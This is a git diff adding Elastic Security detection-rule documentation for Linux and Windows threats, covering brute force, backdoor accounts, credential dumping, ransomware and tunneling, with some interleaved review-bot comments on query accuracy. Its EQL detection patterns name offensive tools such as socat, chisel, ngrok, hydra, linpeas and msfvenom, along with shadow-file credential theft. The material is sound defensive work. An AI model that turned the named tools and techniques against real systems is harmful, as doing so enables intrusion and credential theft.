where host.os.type == "linux" and process.name == "mount" and event.action == "exec" and +process.args == "/proc" and process.args == "-o" and process.args : "*hidepid=2*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: 
https://attack.mitre.org/techniques/T1564/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc new file mode 100644 index 0000000000..2642832ad8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc 
@@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected]] +=== Potential Internal Linux SSH Brute Force Detected + +Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Internal Linux SSH Brute Force Detected + +The rule identifies consecutive internal SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. 
+ +### Related Rules + +- Potential External Linux SSH Brute Force Detected - fa210b61-b627-4e5e-86f4-17e8270656ab +- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [ authentication where host.os.type == "linux" and + event.action in ("ssh_login", "user_login") and event.outcome == "failure" and + cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", + "::1", "FE80::/10", "FF00::/8") ] with runs = 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc new file mode 100644 index 0000000000..7edb437f7e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc 
@@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share]] +=== Potential Lateral Tool Transfer via SMB Share + +Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Lateral Tool Transfer via SMB Share + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. 
+- Retrieve the created file and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=30s + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and + network.direction : ("incoming", "ingress") and + network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" + ] by process.entity_id + /* add more executable extensions here if they are not noisy in your environment */ + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll"))] by process.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc new file mode 100644 index 0000000000..b58e4524f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc 
@@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation]] +=== Potential Linux Backdoor User Account Creation + +Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Linux Backdoor User Account Creation + +The `usermod` command is used to modify user account attributes and settings in Linux-based operating systems. + +Attackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account. + +This rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. 
Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps +- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes. + - !{osquery{"label":"Osquery - Retrieve User Accounts with a UID of 0","query":"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'"}} +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} +- Identify if the account was added to privileged groups or assigned special privileges after creation. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific Group","query":"SELECT * FROM groups WHERE groupname = {{group.name}}"}} +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. 
+ +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Delete the created account. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event") and process.name == "usermod" and +process.args : "-u" and process.args : "0" and process.args : "-o" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create Account +** ID: T1136 +** Reference URL: https://attack.mitre.org/techniques/T1136/ +* Sub-technique: +** Name: Local Account +** ID: T1136.001 +** Reference URL: https://attack.mitre.org/techniques/T1136/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc new file mode 100644 index 0000000000..242e0297be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc 
@@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem]] +=== Potential Linux Credential Dumping via Proc Filesystem + +Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/huntergregal/mimipenguin +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.name,host.name with maxspan=1m +[process where host.os.type == "linux" and process.name == "ps" and event.action == "exec" + and process.args in ("-eo", "pid", "command") ] + +[process where host.os.type == "linux" and process.name == "strings" and event.action == "exec" + and process.args : "/tmp/*" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: 
https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Proc Filesystem +** ID: T1003.007 +** Reference URL: https://attack.mitre.org/techniques/T1003/007/ +* Technique: +** Name: Exploitation for Credential Access +** ID: T1212 +** Reference URL: https://attack.mitre.org/techniques/T1212/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc new file mode 100644 index 0000000000..550e436642 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc 
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow]] +=== Potential Linux Credential Dumping via Unshadow + +Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ + +*Tags*: + +* Data Source: Elastic Endgame +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and process.name == "unshadow" and + event.type == "start" and event.action in ("exec", "exec_event") and process.args_count >= 2 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc new file mode 100644 index 0000000000..cc5d22356f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc 
@@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-linux-hack-tool-launched]] +=== Potential Linux Hack Tool Launched + +Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ( + // exploitation frameworks + "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", + // network scanners (nmap left out to reduce noise) + "zenmap", "nuclei", "netdiscover", "legion", + // web enumeration + "gobuster", "dirbuster", "dirb", "wfuzz", "ffuf", "whatweb", "eyewitness", + // web vulnerability scanning + "wpscan", "joomscan", "droopescan", "nikto", + // exploitation tools + "sqlmap", "commix", "yersinia", + // cracking and brute forcing + "john", "hashcat", "hydra", "ncrack", "cewl", "fcrackzip", "rainbowcrack", + // host and network + "linenum.sh", "linpeas.sh", "pspy32", "pspy32s", "pspy64", "pspy64s", "binwalk", "evil-winrm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: 
https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc new file mode 100644 index 0000000000..34e2e5f1c0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc 
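Review bot: in the Potential Linux Hack Tool Launched query, the entries "linenum.sh" and "linpeas.sh" in the `process.name in (...)` list only match when the script is executed directly and the kernel sets the process name from the script file; when it is started through an interpreter (for example `bash linpeas.sh`), process.name is the interpreter and the script name is only present in process.args, so these two entries give partial coverage. Suggest either stating that limitation in the description or adding a second clause that checks process.args for the same script names, in the same commented-group style as the existing list.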
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected]] +=== Potential Linux Local Account Brute Force Detected + +Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.executable, user.id with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "su" and + not process.parent.name in ( + "bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "clickhouse-server" + )] with runs=10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ 
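Review bot: the description in this hunk says only "within a short time interval", but the query's actual thresholds, `with runs=10` `su` executions inside `maxspan=1s` keyed by host.id, process.parent.executable and user.id, are never stated; the ransomware rule in this same package spells out its "1 second timespan", so suggest the same here (for example "ten su executions by the same parent process and user within one second"). Minor wording in the same paragraph: "local linux user account" should capitalize Linux, and "customly crafted passwords" should be "custom-crafted passwords".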
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc new file mode 100644 index 0000000000..33cbef2d8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc 
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected]] +=== Potential Linux Ransomware Note Creation Detected + +This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=1s + [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and + file.path : ( + "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 + [file where host.os.type == "linux" and event.action == "creation" and file.name : ( + "*crypt*", "*restore*", "*lock*", "*recovery*", "*data*", "*read*", "*instruction*", "*how_to*", "*ransom*" + )] + 
+---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc new file mode 100644 index 0000000000..a77a9e00e7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc 
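Review bot: in the Potential Linux Ransomware Note Creation Detected rule, the description says the second step matches "the creation of a .txt file", but the creation clause `file.name : ("*crypt*", "*restore*", "*lock*", ...)` carries no extension condition, so any file whose name contains one of those keywords satisfies it, and entries such as "*data*" and "*read*" occur in many ordinary file names. Either add an extension condition to the second clause (for example `file.extension : "txt"`, in the same style as the first clause's `file.extension : "?*"`) so the query matches the description, or change the description to "a file whose name contains ransomware keywords".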
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding]] +=== Potential Linux Tunneling and/or Port Forwarding + +This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and (( + // gost & pivotnacci - spawned without process.parent.name + (process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( + // ssh + (process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4 and + not process.args : "chmod")) or + // sshuttle + (process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or + // socat + (process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or + 
// chisel + (process.name : "chisel*" and process.args in ("client", "server")) or + // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok + (process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) + ) and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc new file mode 100644 index 0000000000..071c2a9391 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc 
